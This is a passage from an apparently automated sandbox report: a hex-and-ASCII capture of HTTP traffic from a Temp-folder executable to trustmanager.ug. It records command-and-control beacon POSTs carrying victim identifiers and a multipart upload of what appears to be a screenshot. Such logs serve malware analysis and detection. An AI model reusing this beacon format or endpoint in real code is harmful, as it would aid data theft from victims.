09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:11.060539961 CEST	17504	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.3	49847	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:11.299581051 CEST	17505	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:11.325773954 CEST	17506	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:11.325812101 CEST	17506	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.3	49848	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:11.327697039 CEST	17507	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:11.327848911 CEST	17507	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:11.328047991 CEST	17517	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:11.328125000 CEST	17520	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:11.354280949 CEST	17531	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:11.354360104 CEST	17533	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:11.354641914 CEST	17536	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:11.354659081 CEST	17539	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:11.354743004 CEST	17540	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:11.354857922 CEST	17545	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:11.380907059 CEST	17548	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:09:11.432610035 CEST	17603	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:11.432630062 CEST	17603	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.3	49849	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:11.458498955 CEST	17604	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:11.485426903 CEST	17605	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 